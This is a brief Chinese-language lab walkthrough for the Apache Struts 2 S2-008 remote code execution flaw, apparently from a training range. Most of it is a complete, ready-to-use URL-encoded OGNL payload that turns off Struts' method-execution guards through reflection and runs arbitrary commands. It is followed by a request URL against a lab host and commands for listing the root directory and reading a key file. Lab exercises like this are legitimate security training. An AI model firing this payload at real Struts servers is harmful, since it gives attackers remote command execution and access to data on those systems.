靶场地址:
https://www.mozhe.cn/bug/detail/VnNpNER3WnprM0xSMS9VV2tuUkpRQT09bW96aGUmozhe
影响范围:Struts 2.1.0 - Struts 2.3.1
漏洞概述:为防止攻击者调用参数中的任意方法xwork.MethodAccessor.denyMethodExecution设定为true且SecurityMemberAccess中allowStaticMethodAccess被设置默认为false。并且在ParameterInterceptorStruts 2.2.1.1中应用了改进的参数名称白名单,然而在一些情况下可以绕过这些限制执行恶意代码
Exp:
debug=command&expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d@java.lang.Runtime@getRuntime%28%29.exec%28%22[命令]%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29
将需要执行的命令替换到exp的[命令]中
构造url:http://219.153.49.228:42095/s2-008?[exp]
执行ls /命令
清除所有历史记录又或者打开新的隐私窗口(每次执行命令都要这么做,否则会返回null),再执行cat /key.txt命令
网友评论